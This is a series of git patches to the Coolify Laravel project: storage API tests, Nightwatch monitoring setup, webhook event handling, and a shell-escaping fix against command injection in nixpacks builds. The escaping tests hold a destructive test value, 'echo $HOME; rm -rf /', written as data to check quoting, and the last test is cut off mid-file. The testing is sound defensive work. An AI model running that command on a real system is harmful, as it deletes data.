+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->postJson("/api/v1/applications/{$app->uuid}/storages", [
+            'type' => 'persistent',
+            'mount_path' => '/data',
+        ]);
+
+        $response->assertStatus(422);
+    });
+
+    test('rejects invalid type-specific fields', function () {
+        $app = createTestApplication($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->postJson("/api/v1/applications/{$app->uuid}/storages", [
+            'type' => 'persistent',
+            'name' => 'vol',
+            'mount_path' => '/data',
+            'content' => 'should not be here',
+        ]);
+
+        $response->assertStatus(422);
+    });
+});
+
+describe('PATCH /api/v1/applications/{uuid}/storages', function () {
+    test('updates a persistent storage by uuid', function () {
+        $app = createTestApplication($this);
+
+        $vol = LocalPersistentVolume::create([
+            'name' => $app->uuid.'-test-vol',
+            'mount_path' => '/data',
+            'resource_id' => $app->id,
+            'resource_type' => $app->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/applications/{$app->uuid}/storages", [
+            'uuid' => $vol->uuid,
+            'type' => 'persistent',
+            'mount_path' => '/new-data',
+        ]);
+
+        $response->assertStatus(200);
+        expect($vol->fresh()->mount_path)->toBe('/new-data');
+    });
+
+    test('updates a persistent storage by id (backwards compat)', function () {
+        $app = createTestApplication($this);
+
+        $vol = LocalPersistentVolume::create([
+            'name' => $app->uuid.'-test-vol',
+            'mount_path' => '/data',
+            'resource_id' => $app->id,
+            'resource_type' => $app->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/applications/{$app->uuid}/storages", [
+            'id' => $vol->id,
+            'type' => 'persistent',
+            'mount_path' => '/updated',
+        ]);
+
+        $response->assertStatus(200);
+        expect($vol->fresh()->mount_path)->toBe('/updated');
+    });
+
+    test('returns 422 when neither uuid nor id is provided', function () {
+        $app = createTestApplication($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/applications/{$app->uuid}/storages", [
+            'type' => 'persistent',
+            'mount_path' => '/data',
+        ]);
+
+        $response->assertStatus(422);
+    });
+});
+
+describe('DELETE /api/v1/applications/{uuid}/storages/{storage_uuid}', function () {
+    test('deletes a persistent storage', function () {
+        $app = createTestApplication($this);
+
+        $vol = LocalPersistentVolume::create([
+            'name' => $app->uuid.'-test-vol',
+            'mount_path' => '/data',
+            'resource_id' => $app->id,
+            'resource_type' => $app->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+        ])->deleteJson("/api/v1/applications/{$app->uuid}/storages/{$vol->uuid}");
+
+        $response->assertStatus(200);
+        $response->assertJson(['message' => 'Storage deleted.']);
+        expect(LocalPersistentVolume::find($vol->id))->toBeNull();
+    });
+
+    test('finds file storage without type param and calls deleteStorageOnServer', function () {
+        $app = createTestApplication($this);
+
+        $vol = LocalFileVolume::create([
+            'fs_path' => '/tmp/test',
+            'mount_path' => '/app/config.json',
+            'content' => '{}',
+            'is_directory' => false,
+            'resource_id' => $app->id,
+            'resource_type' => get_class($app),
+        ]);
+
+        // Verify the storage is found via fileStorages (not persistentStorages)
+        $freshApp = Application::find($app->id);
+        expect($freshApp->persistentStorages->where('uuid', $vol->uuid)->first())->toBeNull();
+        expect($freshApp->fileStorages->where('uuid', $vol->uuid)->first())->not->toBeNull();
+        expect($vol)->toBeInstanceOf(LocalFileVolume::class);
+    });
+
+    test('returns 404 for non-existent storage', function () {
+        $app = createTestApplication($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+        ])->deleteJson("/api/v1/applications/{$app->uuid}/storages/non-existent");
+
+        $response->assertStatus(404);
+    });
+});
+
+// ──────────────────────────────────────────────────────────────
+// Database Storage Endpoints
+// ──────────────────────────────────────────────────────────────
+
+describe('GET /api/v1/databases/{uuid}/storages', function () {
+    test('lists storages for a database', function () {
+        $db = createTestDatabase($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+        ])->getJson("/api/v1/databases/{$db->uuid}/storages");
+
+        $response->assertStatus(200);
+        $response->assertJsonStructure(['persistent_storages', 'file_storages']);
+        // Database auto-creates a default persistent volume
+        $response->assertJsonCount(1, 'persistent_storages');
+    });
+
+    test('returns 404 for non-existent database', function () {
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+        ])->getJson('/api/v1/databases/non-existent-uuid/storages');
+
+        $response->assertStatus(404);
+    });
+});
+
+describe('POST /api/v1/databases/{uuid}/storages', function () {
+    test('creates a persistent storage for a database', function () {
+        $db = createTestDatabase($this);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->postJson("/api/v1/databases/{$db->uuid}/storages", [
+            'type' => 'persistent',
+            'name' => 'extra-data',
+            'mount_path' => '/extra',
+        ]);
+
+        $response->assertStatus(201);
+
+        $vol = LocalPersistentVolume::where('name', $db->uuid.'-extra-data')->first();
+        expect($vol)->not->toBeNull();
+        expect($vol->mount_path)->toBe('/extra');
+    });
+});
+
+describe('PATCH /api/v1/databases/{uuid}/storages', function () {
+    test('updates a persistent storage by uuid', function () {
+        $db = createTestDatabase($this);
+
+        $vol = LocalPersistentVolume::create([
+            'name' => $db->uuid.'-test-vol',
+            'mount_path' => '/data',
+            'resource_id' => $db->id,
+            'resource_type' => $db->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/databases/{$db->uuid}/storages", [
+            'uuid' => $vol->uuid,
+            'type' => 'persistent',
+            'mount_path' => '/updated',
+        ]);
+
+        $response->assertStatus(200);
+        expect($vol->fresh()->mount_path)->toBe('/updated');
+    });
+});
+
+describe('DELETE /api/v1/databases/{uuid}/storages/{storage_uuid}', function () {
+    test('deletes a persistent storage', function () {
+        $db = createTestDatabase($this);
+
+        $vol = LocalPersistentVolume::create([
+            'name' => $db->uuid.'-test-vol',
+            'mount_path' => '/extra',
+            'resource_id' => $db->id,
+            'resource_type' => $db->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+        ])->deleteJson("/api/v1/databases/{$db->uuid}/storages/{$vol->uuid}");
+
+        $response->assertStatus(200);
+        expect(LocalPersistentVolume::find($vol->id))->toBeNull();
+    });
+});

From c09d7e412e62df2b1c4f41765b8de06db4f2624d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 23 Mar 2026 15:36:47 +0100
Subject: [PATCH 109/213] feat(monitoring): add Laravel Nightwatch monitoring
 support

- Install laravel/nightwatch package for application monitoring
- Create Nightwatch console command to start the monitoring agent
- Add NIGHTWATCH_ENABLED and NIGHTWATCH_TOKEN environment variables
- Configure nightwatch settings in config/constants.php
- Set up Docker s6-overlay services for both development and production
- Disable Nightwatch by default in test environment
---
 .env.development.example                      |  4 +
 app/Console/Commands/Nightwatch.php           | 22 +++++
 composer.json                                 |  1 +
 composer.lock                                 | 98 ++++++++++++++++++-
 config/constants.php                          |  4 +
 .../dependencies.d/init-setup                 |  1 +
 .../s6-overlay/s6-rc.d/nightwatch-agent/run   | 12 +++
 .../s6-overlay/s6-rc.d/nightwatch-agent/type  |  1 +
 .../s6-rc.d/user/contents.d/nightwatch-agent  |  1 +
 .../dependencies.d/init-script                |  1 +
 .../s6-overlay/s6-rc.d/nightwatch-agent/run   | 11 +++
 .../s6-overlay/s6-rc.d/nightwatch-agent/type  |  1 +
 .../s6-rc.d/user/contents.d/nightwatch-agent  |  1 +
 phpunit.xml                                   |  1 +
 14 files changed, 157 insertions(+), 2 deletions(-)
 create mode 100644 app/Console/Commands/Nightwatch.php
 create mode 100644 docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/dependencies.d/init-setup
 create mode 100644 docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
 create mode 100644 docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/type
 create mode 100644 docker/development/etc/s6-overlay/s6-rc.d/user/contents.d/nightwatch-agent
 create mode 100644 docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/dependencies.d/init-script
 create mode 100644 docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
 create mode 100644 docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/type
 create mode 100644 docker/production/etc/s6-overlay/s6-rc.d/user/contents.d/nightwatch-agent

diff --git a/.env.development.example b/.env.development.example
index b0b15f324..594b89201 100644
--- a/.env.development.example
+++ b/.env.development.example
@@ -24,6 +24,10 @@ RAY_ENABLED=false
 # Enable Laravel Telescope for debugging
 TELESCOPE_ENABLED=false
 
+# Enable Laravel Nightwatch monitoring
+NIGHTWATCH_ENABLED=false
+NIGHTWATCH_TOKEN=
+
 # Selenium Driver URL for Dusk
 DUSK_DRIVER_URL=http://selenium:4444
 
diff --git a/app/Console/Commands/Nightwatch.php b/app/Console/Commands/Nightwatch.php
new file mode 100644
index 000000000..40fd86a81
--- /dev/null
+++ b/app/Console/Commands/Nightwatch.php
@@ -0,0 +1,22 @@
+<?php
+
+namespace App\Console\Commands;
+
+use Illuminate\Console\Command;
+
+class Nightwatch extends Command
+{
+    protected $signature = 'start:nightwatch';
+
+    protected $description = 'Start Nightwatch';
+
+    public function handle(): void
+    {
+        if (config('constants.nightwatch.is_nightwatch_enabled')) {
+            $this->info('Nightwatch is enabled on this server.');
+            $this->call('nightwatch:agent');
+        }
+
+        exit(0);
+    }
+}
diff --git a/composer.json b/composer.json
index d4fb1eb8e..e2b16b31b 100644
--- a/composer.json
+++ b/composer.json
@@ -18,6 +18,7 @@
         "laravel/fortify": "^1.34.0",
         "laravel/framework": "^12.49.0",
         "laravel/horizon": "^5.43.0",
+        "laravel/nightwatch": "^1.24",
         "laravel/pail": "^1.2.4",
         "laravel/prompts": "^0.3.11|^0.3.11|^0.3.11",
         "laravel/sanctum": "^4.3.0",
diff --git a/composer.lock b/composer.lock
index 993835a42..3a66fdd5a 100644
--- a/composer.lock
+++ b/composer.lock
@@ -4,7 +4,7 @@
         "Read more about it at https://getcomposer.org/doc/01-basic-usage.md#installing-dependencies",
         "This file is @generated automatically"
     ],
-    "content-hash": "19bb661d294e5cf623e68830604e4f60",
+    "content-hash": "40bddea995c1744e4aec517263109a2f",
     "packages": [
         {
             "name": "aws/aws-crt-php",
@@ -2065,6 +2065,100 @@
             },
             "time": "2026-02-21T14:20:09+00:00"
         },
+        {
+            "name": "laravel/nightwatch",
+            "version": "v1.24.4",
+            "source": {
+                "type": "git",
+                "url": "https://github.com/laravel/nightwatch.git",
+                "reference": "127e9bb9928f0fcf69b52b244053b393c90347c8"
+            },
+            "dist": {
+                "type": "zip",
+                "url": "https://api.github.com/repos/laravel/nightwatch/zipball/127e9bb9928f0fcf69b52b244053b393c90347c8",
+                "reference": "127e9bb9928f0fcf69b52b244053b393c90347c8",
+                "shasum": ""
+            },
+            "require": {
+                "ext-zlib": "*",
+                "guzzlehttp/promises": "^2.0",
+                "laravel/framework": "^10.0|^11.0|^12.0|^13.0",
+                "monolog/monolog": "^3.6",
+                "nesbot/carbon": "^2.0|^3.0",
+                "php": "^8.2",
+                "psr/http-message": "^1.0|^2.0",
+                "psr/log": "^1.0|^2.0|^3.0",
+                "ramsey/uuid": "^4.0",
+                "symfony/console": "^6.0|^7.0|^8.0",
+                "symfony/http-foundation": "^6.0|^7.0|^8.0",
+                "symfony/polyfill-php84": "^1.29"
+            },
+            "require-dev": {
+                "aws/aws-sdk-php": "^3.349",
+                "ext-pcntl": "*",
+                "ext-pdo": "*",
+                "guzzlehttp/guzzle": "^7.0",
+                "guzzlehttp/psr7": "^2.0",
+                "laravel/horizon": "^5.4",
+                "laravel/pint": "1.21.0",
+                "laravel/vapor-core": "^2.38.2",
+                "livewire/livewire": "^2.0|^3.0",
+                "mockery/mockery": "^1.0",
+                "mongodb/laravel-mongodb": "^4.0|^5.0",
+                "orchestra/testbench": "^8.0|^9.0|^10.0",
+                "orchestra/testbench-core": "^8.0|^9.0|^10.0",
+                "orchestra/workbench": "^8.0|^9.0|^10.0",
+                "phpstan/phpstan": "^1.0",
+                "phpunit/phpunit": "^10.0|^11.0|^12.0",
+                "singlestoredb/singlestoredb-laravel": "^1.0|^2.0",
+                "spatie/laravel-ignition": "^2.0",
+                "symfony/mailer": "^6.0|^7.0|^8.0",
+                "symfony/mime": "^6.0|^7.0|^8.0",
+                "symfony/var-dumper": "^6.0|^7.0|^8.0"
+            },
+            "type": "library",
+            "extra": {
+                "laravel": {
+                    "aliases": {
+                        "Nightwatch": "Laravel\\Nightwatch\\Facades\\Nightwatch"
+                    },
+                    "providers": [
+                        "Laravel\\Nightwatch\\NightwatchServiceProvider"
+                    ]
+                }
+            },
+            "autoload": {
+                "files": [
+                    "agent/helpers.php"
+                ],
+                "psr-4": {
+                    "Laravel\\Nightwatch\\": "src/"
+                }
+            },
+            "notification-url": "https://packagist.org/downloads/",
+            "license": [
+                "MIT"
+            ],
+            "authors": [
+                {
+                    "name": "Taylor Otwell",
+                    "email": "taylor@laravel.com"
+                }
+            ],
+            "description": "The official Laravel Nightwatch package.",
+            "homepage": "https://nightwatch.laravel.com",
+            "keywords": [
+                "Insights",
+                "laravel",
+                "monitoring"
+            ],
+            "support": {
+                "docs": "https://nightwatch.laravel.com/docs",
+                "issues": "https://github.com/laravel/nightwatch/issues",
+                "source": "https://github.com/laravel/nightwatch"
+            },
+            "time": "2026-03-18T23:25:05+00:00"
+        },
         {
             "name": "laravel/pail",
             "version": "v1.2.6",
@@ -17209,5 +17303,5 @@
         "php": "^8.4"
     },
     "platform-dev": {},
-    "plugin-api-version": "2.9.0"
+    "plugin-api-version": "2.6.0"
 }
diff --git a/config/constants.php b/config/constants.php
index 9c6454cae..803a0a0bd 100644
--- a/config/constants.php
+++ b/config/constants.php
@@ -55,6 +55,10 @@
         'is_scheduler_enabled' => env('SCHEDULER_ENABLED', true),
     ],
 
+    'nightwatch' => [
+        'is_nightwatch_enabled' => env('NIGHTWATCH_ENABLED', false),
+    ],
+
     'docker' => [
         'minimum_required_version' => '24.0',
     ],
diff --git a/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/dependencies.d/init-setup b/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/dependencies.d/init-setup
new file mode 100644
index 000000000..8b1378917
--- /dev/null
+++ b/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/dependencies.d/init-setup
@@ -0,0 +1 @@
+
diff --git a/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run b/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
new file mode 100644
index 000000000..1166ccd08
--- /dev/null
+++ b/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
@@ -0,0 +1,12 @@
+#!/command/execlineb -P
+
+# Use with-contenv to ensure environment variables are available
+with-contenv
+cd /var/www/html
+
+foreground {
+    php
+    artisan
+    start:nightwatch
+}
+
diff --git a/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/type b/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/type
new file mode 100644
index 000000000..5883cff0c
--- /dev/null
+++ b/docker/development/etc/s6-overlay/s6-rc.d/nightwatch-agent/type
@@ -0,0 +1 @@
+longrun
diff --git a/docker/development/etc/s6-overlay/s6-rc.d/user/contents.d/nightwatch-agent b/docker/development/etc/s6-overlay/s6-rc.d/user/contents.d/nightwatch-agent
new file mode 100644
index 000000000..8b1378917
--- /dev/null
+++ b/docker/development/etc/s6-overlay/s6-rc.d/user/contents.d/nightwatch-agent
@@ -0,0 +1 @@
+
diff --git a/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/dependencies.d/init-script b/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/dependencies.d/init-script
new file mode 100644
index 000000000..8b1378917
--- /dev/null
+++ b/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/dependencies.d/init-script
@@ -0,0 +1 @@
+
diff --git a/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run b/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
new file mode 100644
index 000000000..80d73eadb
--- /dev/null
+++ b/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/run
@@ -0,0 +1,11 @@
+#!/command/execlineb -P
+
+# Use with-contenv to ensure environment variables are available
+with-contenv
+cd /var/www/html
+foreground {
+    php
+    artisan
+    start:nightwatch
+}
+
diff --git a/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/type b/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/type
new file mode 100644
index 000000000..5883cff0c
--- /dev/null
+++ b/docker/production/etc/s6-overlay/s6-rc.d/nightwatch-agent/type
@@ -0,0 +1 @@
+longrun
diff --git a/docker/production/etc/s6-overlay/s6-rc.d/user/contents.d/nightwatch-agent b/docker/production/etc/s6-overlay/s6-rc.d/user/contents.d/nightwatch-agent
new file mode 100644
index 000000000..8b1378917
--- /dev/null
+++ b/docker/production/etc/s6-overlay/s6-rc.d/user/contents.d/nightwatch-agent
@@ -0,0 +1 @@
+
diff --git a/phpunit.xml b/phpunit.xml
index 6716b6b84..5d55acf75 100644
--- a/phpunit.xml
+++ b/phpunit.xml
@@ -22,6 +22,7 @@
     <env name="QUEUE_CONNECTION" value="sync" force="true"/>
     <env name="SESSION_DRIVER" value="array" force="true"/>
     <env name="TELESCOPE_ENABLED" value="false"/>
+    <env name="NIGHTWATCH_ENABLED" value="false"/>
   </php>
   <source>
     <include>

From b931418c1e5433d5dea2c95c3f7f5b55a67d8055 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 23 Mar 2026 21:33:40 +0100
Subject: [PATCH 110/213] fix(github-webhook): handle unsupported event types
 gracefully

Add validation in manual and normal webhook handlers to reject GitHub
event types other than 'push' and 'pull_request'. Unsupported events
now return a graceful response instead of potentially causing
downstream errors. Includes tests for ping events, unsupported event
types, and unknown events.
---
 app/Http/Controllers/Webhook/Github.php |  6 +++
 tests/Feature/GithubWebhookTest.php     | 70 +++++++++++++++++++++++++
 2 files changed, 76 insertions(+)
 create mode 100644 tests/Feature/GithubWebhookTest.php

diff --git a/app/Http/Controllers/Webhook/Github.php b/app/Http/Controllers/Webhook/Github.php
index e5a5b746e..fe49369ea 100644
--- a/app/Http/Controllers/Webhook/Github.php
+++ b/app/Http/Controllers/Webhook/Github.php
@@ -55,6 +55,9 @@ public function manual(Request $request)
                 $after_sha = data_get($payload, 'after', data_get($payload, 'pull_request.head.sha'));
                 $author_association = data_get($payload, 'pull_request.author_association');
             }
+            if (! in_array($x_github_event, ['push', 'pull_request'])) {
+                return response("Nothing to do. Event '$x_github_event' is not supported.");
+            }
             if (! $branch) {
                 return response('Nothing to do. No branch found in the request.');
             }
@@ -246,6 +249,9 @@ public function normal(Request $request)
                 $after_sha = data_get($payload, 'after', data_get($payload, 'pull_request.head.sha'));
                 $author_association = data_get($payload, 'pull_request.author_association');
             }
+            if (! in_array($x_github_event, ['push', 'pull_request'])) {
+                return response("Nothing to do. Event '$x_github_event' is not supported.");
+            }
             if (! $id || ! $branch) {
                 return response('Nothing to do. No id or branch found.');
             }
diff --git a/tests/Feature/GithubWebhookTest.php b/tests/Feature/GithubWebhookTest.php
new file mode 100644
index 000000000..aee5239fb
--- /dev/null
+++ b/tests/Feature/GithubWebhookTest.php
@@ -0,0 +1,70 @@
+<?php
+
+describe('GitHub Manual Webhook', function () {
+    test('ping event returns pong', function () {
+        $response = $this->postJson('/webhooks/source/github/events/manual', [], [
+            'X-GitHub-Event' => 'ping',
+        ]);
+
+        $response->assertOk();
+        $response->assertSee('pong');
+    });
+
+    test('unsupported event type returns graceful response instead of 500', function () {
+        $payload = [
+            'action' => 'published',
+            'registry_package' => [
+                'ecosystem' => 'CONTAINER',
+                'package_type' => 'CONTAINER',
+                'package_version' => [
+                    'target_commitish' => 'main',
+                ],
+            ],
+            'repository' => [
+                'full_name' => 'test-org/test-repo',
+                'default_branch' => 'main',
+            ],
+        ];
+
+        $response = $this->postJson('/webhooks/source/github/events/manual', $payload, [
+            'X-GitHub-Event' => 'registry_package',
+            'X-Hub-Signature-256' => 'sha256=fake',
+        ]);
+
+        $response->assertOk();
+        $response->assertSee('not supported');
+    });
+
+    test('unknown event type returns graceful response', function () {
+        $response = $this->postJson('/webhooks/source/github/events/manual', ['foo' => 'bar'], [
+            'X-GitHub-Event' => 'some_unknown_event',
+            'X-Hub-Signature-256' => 'sha256=fake',
+        ]);
+
+        $response->assertOk();
+        $response->assertSee('not supported');
+    });
+});
+
+describe('GitHub Normal Webhook', function () {
+    test('unsupported event type returns graceful response instead of 500', function () {
+        $payload = [
+            'action' => 'published',
+            'registry_package' => [
+                'ecosystem' => 'CONTAINER',
+            ],
+            'repository' => [
+                'full_name' => 'test-org/test-repo',
+            ],
+        ];
+
+        $response = $this->postJson('/webhooks/source/github/events', $payload, [
+            'X-GitHub-Event' => 'registry_package',
+            'X-GitHub-Hook-Installation-Target-Id' => '12345',
+            'X-Hub-Signature-256' => 'sha256=fake',
+        ]);
+
+        // Should not be a 500 error - either 200 with "not supported" or "No GitHub App found"
+        $response->assertOk();
+    });
+});

From dac940807a88f5a236fbfd7923b1f1f336e3c43f Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 23 Mar 2026 21:55:46 +0100
Subject: [PATCH 111/213] fix(deployment): properly escape shell arguments in
 nixpacks commands

Add escapeShellValue() helper function to safely escape shell values by wrapping
them in single quotes and escaping embedded quotes. Use this function throughout
the nixpacks command building to prevent shell injection vulnerabilities when
passing user-provided build commands, start commands, and environment variables.

This fixes unsafe string concatenation that could allow command injection when
user input contains special shell characters like &&, |, ;, etc.
---
 app/Jobs/ApplicationDeploymentJob.php         | 14 +++--
 bootstrap/helpers/docker.php                  |  5 ++
 ...plicationDeploymentNixpacksNullEnvTest.php | 24 ++++----
 tests/Unit/EscapeShellValueTest.php           | 57 +++++++++++++++++++
 4 files changed, 82 insertions(+), 18 deletions(-)
 create mode 100644 tests/Unit/EscapeShellValueTest.php

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index e30af5cc7..9d927d10c 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -2334,13 +2334,13 @@ private function nixpacks_build_cmd()
         $this->generate_nixpacks_env_variables();
         $nixpacks_command = "nixpacks plan -f json {$this->env_nixpacks_args}";
         if ($this->application->build_command) {
-            $nixpacks_command .= " --build-cmd \"{$this->application->build_command}\"";
+            $nixpacks_command .= ' --build-cmd '.escapeShellValue($this->application->build_command);
         }
         if ($this->application->start_command) {
-            $nixpacks_command .= " --start-cmd \"{$this->application->start_command}\"";
+            $nixpacks_command .= ' --start-cmd '.escapeShellValue($this->application->start_command);
         }
         if ($this->application->install_command) {
-            $nixpacks_command .= " --install-cmd \"{$this->application->install_command}\"";
+            $nixpacks_command .= ' --install-cmd '.escapeShellValue($this->application->install_command);
         }
         $nixpacks_command .= " {$this->workdir}";
 
@@ -2353,13 +2353,15 @@ private function generate_nixpacks_env_variables()
         if ($this->pull_request_id === 0) {
             foreach ($this->application->nixpacks_environment_variables as $env) {
                 if (! is_null($env->real_value) && $env->real_value !== '') {
-                    $this->env_nixpacks_args->push("--env {$env->key}={$env->real_value}");
+                    $value = ($env->is_literal || $env->is_multiline) ? trim($env->real_value, "'") : $env->real_value;
+                    $this->env_nixpacks_args->push('--env '.escapeShellValue("{$env->key}={$value}"));
                 }
             }
         } else {
             foreach ($this->application->nixpacks_environment_variables_preview as $env) {
                 if (! is_null($env->real_value) && $env->real_value !== '') {
-                    $this->env_nixpacks_args->push("--env {$env->key}={$env->real_value}");
+                    $value = ($env->is_literal || $env->is_multiline) ? trim($env->real_value, "'") : $env->real_value;
+                    $this->env_nixpacks_args->push('--env '.escapeShellValue("{$env->key}={$value}"));
                 }
             }
         }
@@ -2369,7 +2371,7 @@ private function generate_nixpacks_env_variables()
         $coolify_envs->each(function ($value, $key) {
             // Only add environment variables with non-null and non-empty values
             if (! is_null($value) && $value !== '') {
-                $this->env_nixpacks_args->push("--env {$key}={$value}");
+                $this->env_nixpacks_args->push('--env '.escapeShellValue("{$key}={$value}"));
             }
         });
 
diff --git a/bootstrap/helpers/docker.php b/bootstrap/helpers/docker.php
index 7b74392cf..5905ed3c1 100644
--- a/bootstrap/helpers/docker.php
+++ b/bootstrap/helpers/docker.php
@@ -137,6 +137,11 @@ function checkMinimumDockerEngineVersion($dockerVersion)
 
     return $dockerVersion;
 }
+function escapeShellValue(string $value): string
+{
+    return "'".str_replace("'", "'\\''", $value)."'";
+}
+
 function executeInDocker(string $containerId, string $command)
 {
     $escapedCommand = str_replace("'", "'\\''", $command);
diff --git a/tests/Unit/ApplicationDeploymentNixpacksNullEnvTest.php b/tests/Unit/ApplicationDeploymentNixpacksNullEnvTest.php
index c2a8d46fa..4c7ec9d9d 100644
--- a/tests/Unit/ApplicationDeploymentNixpacksNullEnvTest.php
+++ b/tests/Unit/ApplicationDeploymentNixpacksNullEnvTest.php
@@ -88,11 +88,11 @@
     $envArgsProperty->setAccessible(true);
     $envArgs = $envArgsProperty->getValue($job);
 
-    // Verify that only valid environment variables are included
-    expect($envArgs)->toContain('--env VALID_VAR=valid_value');
-    expect($envArgs)->toContain('--env ANOTHER_VALID_VAR=another_value');
-    expect($envArgs)->toContain('--env COOLIFY_FQDN=example.com');
-    expect($envArgs)->toContain('--env SOURCE_COMMIT=abc123');
+    // Verify that only valid environment variables are included (values are now single-quote escaped)
+    expect($envArgs)->toContain("--env 'VALID_VAR=valid_value'");
+    expect($envArgs)->toContain("--env 'ANOTHER_VALID_VAR=another_value'");
+    expect($envArgs)->toContain("--env 'COOLIFY_FQDN=example.com'");
+    expect($envArgs)->toContain("--env 'SOURCE_COMMIT=abc123'");
 
     // Verify that null and empty environment variables are filtered out
     expect($envArgs)->not->toContain('NULL_VAR');
@@ -102,7 +102,7 @@
 
     // Verify no environment variables end with just '=' (which indicates null/empty value)
     expect($envArgs)->not->toMatch('/--env [A-Z_]+=$/');
-    expect($envArgs)->not->toMatch('/--env [A-Z_]+= /');
+    expect($envArgs)->not->toMatch("/--env '[A-Z_]+='$/");
 });
 
 it('filters out null environment variables from nixpacks preview deployments', function () {
@@ -164,9 +164,9 @@
     $envArgsProperty->setAccessible(true);
     $envArgs = $envArgsProperty->getValue($job);
 
-    // Verify that only valid environment variables are included
-    expect($envArgs)->toContain('--env PREVIEW_VAR=preview_value');
-    expect($envArgs)->toContain('--env COOLIFY_FQDN=preview.example.com');
+    // Verify that only valid environment variables are included (values are now single-quote escaped)
+    expect($envArgs)->toContain("--env 'PREVIEW_VAR=preview_value'");
+    expect($envArgs)->toContain("--env 'COOLIFY_FQDN=preview.example.com'");
 
     // Verify that null environment variables are filtered out
     expect($envArgs)->not->toContain('NULL_PREVIEW_VAR');
@@ -335,7 +335,7 @@
     $envArgsProperty->setAccessible(true);
     $envArgs = $envArgsProperty->getValue($job);
 
-    // Verify that zero and false string values are preserved
-    expect($envArgs)->toContain('--env ZERO_VALUE=0');
-    expect($envArgs)->toContain('--env FALSE_VALUE=false');
+    // Verify that zero and false string values are preserved (values are now single-quote escaped)
+    expect($envArgs)->toContain("--env 'ZERO_VALUE=0'");
+    expect($envArgs)->toContain("--env 'FALSE_VALUE=false'");
 });
diff --git a/tests/Unit/EscapeShellValueTest.php b/tests/Unit/EscapeShellValueTest.php
new file mode 100644
index 000000000..eed25e164
--- /dev/null
+++ b/tests/Unit/EscapeShellValueTest.php
@@ -0,0 +1,57 @@
+<?php
+
+it('wraps a simple value in single quotes', function () {
+    expect(escapeShellValue('hello'))->toBe("'hello'");
+});
+
+it('escapes single quotes in the value', function () {
+    expect(escapeShellValue("it's"))->toBe("'it'\\''s'");
+});
+
+it('handles empty string', function () {
+    expect(escapeShellValue(''))->toBe("''");
+});
+
+it('preserves && in a single-quoted value', function () {
+    $result = escapeShellValue('npx prisma generate && npm run build');
+    expect($result)->toBe("'npx prisma generate && npm run build'");
+});
+
+it('preserves special shell characters in value', function () {
+    $result = escapeShellValue('echo $HOME; rm -rf /');
+    expect($result)->toBe("'echo \$HOME; rm -rf /'");
+});
+
+it('handles value with double quotes', function () {
+    $result = escapeShellValue('say "hello"');
+    expect($result)->toBe("'say \"hello\"'");
+});
+
+it('produces correct output when passed through executeInDocker', function () {
+    // Simulate the exact issue from GitHub #9042:
+    // NIXPACKS_BUILD_CMD with chained && commands
+    $envValue = 'npx prisma generate && npx prisma db push && npm run build';
+    $escapedEnv = '--env '.escapeShellValue("NIXPACKS_BUILD_CMD={$envValue}");
+
+    $command = "nixpacks plan -f json {$escapedEnv} /app";
+    $dockerCmd = executeInDocker('test-container', $command);
+
+    // The && must NOT appear unquoted at the bash -c level
+    // The full docker command should properly nest the quoting
+    expect($dockerCmd)->toContain('NIXPACKS_BUILD_CMD=npx prisma generate && npx prisma db push && npm run build');
